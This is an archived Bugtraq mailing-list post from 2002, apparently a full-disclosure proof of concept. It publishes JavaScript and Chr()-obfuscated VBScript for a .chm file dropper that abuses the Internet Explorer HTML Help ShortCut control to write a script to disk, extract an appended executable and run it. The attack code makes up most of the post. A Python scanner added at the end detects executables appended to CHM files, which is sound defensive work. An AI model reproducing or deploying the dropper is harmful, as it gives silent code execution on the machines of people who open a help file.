Bugtraq mailing list archives

Re: HELP ! : Trojanised HTML: Internet Exporer 5 and 6 [technical exercise]


From: dzzie () yahoo com
Date: Fri, 8 Feb 2002 04:38:47 -0600


technical note: the possibility is excellent to repeat the entire 
process above directly inside the *.chm file and drop an *.exe from 
within the *.chm into the same Temporary Internet File. Using our 
Guninski scripting to determine the location of the *.chm and write 
that to the link parameter within it: value="'+path+'\\malware
[1].exe"> and execute it.


I made a proof of concept of a chm exe dropper a while back;
I guess now's as good a time as any to release it. That
command execution thing in a chm is really dangerous. A chm
is about the same as running an exe right now.

Note this works from the Temporary Internet Files directory as well: all
someone has to do is choose the "open" option when they click a link
to a chm file, and they are done.

I am not going to distribute a prepackaged example; no good could
come of that. Below is the HTML script that is capable of it. Assembling
the package is enough of a process to keep it out of the hands of
the kids.

I will email MS with a link to a working sample for them to examine.

Also remember the mechanism for this exploit was exposed about a year
ago (?), so I am sure other things have been done with this and it is
still a viable hole.

-------------------------------------------------
flow of events
-------------------------------------------------

1) chm opens
     a) determines absolute path of the current folder
     b) determines parent chm name (in case caching changes the name)
     c) detects WinNT or Win98 to work on both

2) chm name is used to auto-generate vbs script data
   abs path is used to auto-generate html object data
   script writes dynamically generated content to window

3) first object activated programmatically....vbs script is echoed
   into existence in the same folder as the parent chm file

4) waits 1 sec then activates echoed.vbs file...this vbs file
   reads the parent .chm and extracts a hello world exe that is
   appended onto the chm file.

5) after the exe is written to disk the vbs script then activates it

-------------------------------------------------------------
script below
-------------------------------------------------------------


// Banner written into the help window after the two shortcut objects.
msg='<center><h1> Holy Mackeral Batman !<br><br> I think he hath done it! <br><br> : )\\</h1></center>'

// Inside a compiled help file location.href looks like
//   mk:@MSITStore:C:\some\folder\file.chm::/page.htm
// Take everything after the second ':' up to and including the last '\'
// to get the absolute folder the .chm is being viewed from.
function getChmAbsPath(){
    var t=unescape(location.href)
    return t.substring(t.indexOf(":",4)+1,t.lastIndexOf("\\")+1)
}

// Return the .chm's own file name (the cache may have renamed it) as a
// VBScript Chr()+Chr()+... expression, prefixed with a backslash
// (Chr(92)), so no quotes have to survive the cmd.exe echo below.
function getChmName(){
    var l=unescape(location.href)
    var chmName=l.substring(l.lastIndexOf("\\")+1,l.lastIndexOf(":")-1)
    var t='Chr(92)+'
    for(var i=0;i<chmName.length;i++){
        t+= 'Chr(' + chmName.charCodeAt(i) + ')+'
    }
    return t.substring(0,t.length-1)    // drop the trailing '+'
}

// cmd.exe on NT/2000/XP, command.com on 9x/ME.
function getInterpreter(){
    if(navigator.userAgent.indexOf('NT') > 0){
        return 'cmd'
    }else{
        return 'command'
    }
}

// The VBScript dropper, one statement per ':'-separated field so the whole
// thing fits on a single "echo" line. String literals are spelled out as
// Chr() sequences: fso = "Scripting.FileSystemObject", wsc = "wscript.shell",
// exename = "\extract.exe". It opens the parent .chm, skips OFFSET bytes
// (the start of the appended exe; left as a placeholder here), copies the
// remainder into extract.exe next to the .chm, and runs it.
vbs='fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):'+
    'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108):'+
    'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+Chr(101)+Chr(120)+Chr(101):'+
    'set i=createobject(fso):'+
    'set o=createobject(fso):'+
    'set w=createobject(wsc):'+
    'pf=i.GetParentFolderName(WSCript.ScriptFullName):'+
    'infile=pf+' + getChmName() + ':'+
    'outfile=pf+exename:'+
    'OFFSET=XXXXXXX:'+
    'Set ii=i.OpenTextFile(infile):'+
    'Set oo=o.OpenTextFile(outfile,2,True):'+
    'ii.Read OFFSET:'+
    'While Not ii.AtEndOfStream:'+
    'oo.Write Chr(Asc(ii.Read(1))):'+
    'Wend:ii.close:oo.close:'+
    'w.Run chr(34)+outfile+chr(34)'

// HTML Help ActiveX control (hhctrl.ocx) with Command=ShortCut.
// Item1 is "window,program,parameters"; the '^' in the id and the '*' in
// Item1 are placeholders that replace() fills in for each instance.
hit='<OBJECT id=shortcut^ type="application/x-oleobject"  '+
    'classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" '+
    'codebase="hhctrl.ocx\#Version=4,72,8252,0" width=100 '+
    'height=100><PARAM name="Command" value="ShortCut">   '+
    '<PARAM name="Text" value="Text: ">                   '+
    '<PARAM name="Item1" value=\',*\'>                    '+
    '<PARAM name="Item2" value="273,1,1"></OBJECT>        '

scriptPath = getChmAbsPath() + 'echoed.vbs'

// shortcut1: cmd /c echo <vbs> > "<folder>\echoed.vbs"
// shortcut2: wscript "<folder>\echoed.vbs"
cmd=new Array
cmd[1]= getInterpreter() + ',/c echo ' + vbs + ' > "' + scriptPath + '"'
cmd[2]='wscript,"' + scriptPath + '"'

// Substitute the instance number for '^' and the command line for '*'.
function replace(h,i,c){
    h = h.split('^').join(i).split('*').join(c)
    return h
}

hit1=replace(hit,1,cmd[1])
hit2=replace(hit,2,cmd[2])

document.write(hit1+hit2+msg)
shortcut1.Click()                        // drop echoed.vbs
setTimeout("shortcut2.Click()",1000)     // give the echo a second, then run it



__________________________________________________________________________
http://geocities.com/dzzie
__________________________________________________________________________
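A check a defender can run against the technique in this post, added here as an example and not part of dzzie's message: the dropper works by gluing the exe onto the end of the compiled .chm and having the vbs seek past OFFSET to reach it, so the file on disk is longer than the ITSF container says it is. The script below parses the ITSF header, reads the declared file size, and reports any bytes past that point. It assumes the layout given in the public reverse-engineered CHM format notes (section table of offset/length QWORDs at 0x38, and the file size as a QWORD at offset 8 of header section 0); the names, the build_constructed_chm() helper and its sample input are constructed for this example.

```python
import struct
import sys

ITSF_MAGIC = b"ITSF"
SECTION0_LEN = 0x18   # header section 0 is 24 bytes; the file-size QWORD sits at its offset 8


def parse_itsf(data):
    """Parse the ITSF container header and return its declared total file size.

    Layout assumed from the public CHM format notes:
      0x00 'ITSF'   0x04 version (DWORD)   0x08 header length (DWORD)
      0x38 section table: offset/length QWORD pairs for header sections 0 and 1
      header section 0: DWORD 0x01FE, DWORD 0, QWORD file size, DWORD 0, DWORD 0
    """
    if len(data) < 0x58 or data[:4] != ITSF_MAGIC:
        raise ValueError("not an ITSF (CHM) container")
    version, header_len = struct.unpack_from("<II", data, 4)
    sec0_off, sec0_len = struct.unpack_from("<QQ", data, 0x38)
    if sec0_len < SECTION0_LEN or sec0_off + SECTION0_LEN > len(data):
        raise ValueError("header section 0 out of range")
    declared_size = struct.unpack_from("<Q", data, sec0_off + 8)[0]
    return {"version": version, "header_len": header_len,
            "declared_size": declared_size}


def find_appended_payload(data):
    """Return (declared_size, trailing_bytes) when the file is longer than the
    container claims, i.e. something was appended after compilation.
    Returns None when the on-disk size matches the declared size."""
    declared = parse_itsf(data)["declared_size"]
    if len(data) <= declared:
        return None
    return declared, data[declared:]


def classify_trailer(trailing):
    """Cheap triage of the appended bytes: the dropper in the post appends a PE."""
    if trailing[:2] == b"MZ":
        return "PE executable (MZ header)"
    return "unknown data"


def build_constructed_chm(body_len, appended=b""):
    """Constructed, minimal ITSF container for offline testing; NOT a real CHM.
    Version-3 header (0x60 bytes), header section 0, a zeroed stand-in for the
    ITSP directory, body_len bytes of filler, then whatever is appended."""
    sec0_off = 0x60
    sec1_off = sec0_off + SECTION0_LEN
    sec1 = b"\x00" * 0x54                           # stand-in for the ITSP directory header
    declared = sec1_off + len(sec1) + body_len      # size the container claims for itself
    sec0 = struct.pack("<IIQII", 0x01FE, 0, declared, 0, 0)
    hdr = ITSF_MAGIC
    hdr += struct.pack("<III", 3, 0x60, 1)          # version, header length, unknown
    hdr += struct.pack("<II", 0, 0x0409)            # timestamp, language id
    hdr += b"\x00" * 32                             # two GUIDs, zeroed in this sample
    hdr += struct.pack("<QQQQ", sec0_off, SECTION0_LEN, sec1_off, len(sec1))
    hdr += struct.pack("<Q", sec1_off + len(sec1))  # v3 content-section offset
    return hdr + sec0 + sec1 + b"\x00" * body_len + appended


def scan_file(path):
    with open(path, "rb") as fh:
        data = fh.read()
    hit = find_appended_payload(data)
    if hit is None:
        return "%s: size matches ITSF header, nothing appended" % path
    declared, trailing = hit
    return "%s: %d bytes appended after declared end (0x%x): %s" % (
        path, len(trailing), declared, classify_trailer(trailing))


if __name__ == "__main__":
    for p in sys.argv[1:]:
        print(scan_file(p))
```

This only catches the append-to-the-chm variant described in the post. A payload compiled into the container as one of its own files, or an OFFSET that points inside the declared size, will not be flagged; for those, decompile the .chm and grep the HTML for the hhctrl.ocx classid adb880a6-d8ff-11cf-9377-00aa003b7a11 with a Command=ShortCut parameter, which is the mechanism the dropper relies on.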
